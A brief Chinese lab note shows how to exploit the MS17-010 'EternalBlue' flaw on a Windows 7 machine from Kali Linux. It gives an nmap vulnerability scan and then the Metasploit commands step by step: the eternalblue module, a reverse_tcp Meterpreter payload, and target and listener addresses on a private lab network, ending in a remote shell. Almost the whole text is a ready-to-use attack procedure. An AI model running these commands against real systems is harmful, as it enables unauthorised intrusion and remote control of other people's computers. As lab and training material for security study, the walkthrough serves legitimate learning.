ms17_010(永恒之蓝)
环境:
Kali-Linux IP:192.168.1.2
Windows 7 IP:192.168.1.10
扫描是否漏洞存在:
nmap --script=vuln -T4 -v 192.168.1.10

扫描结果存在漏洞
漏洞利用:
打开msfconsole,搜索漏洞存放目录 search ms17_010
msf5 > use 2 msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.10 rhosts => 192.168.1.10 msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/ msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.2 lhost => 192.168.1.2

运行脚本,拿到shell


浙公网安备 33010602011771号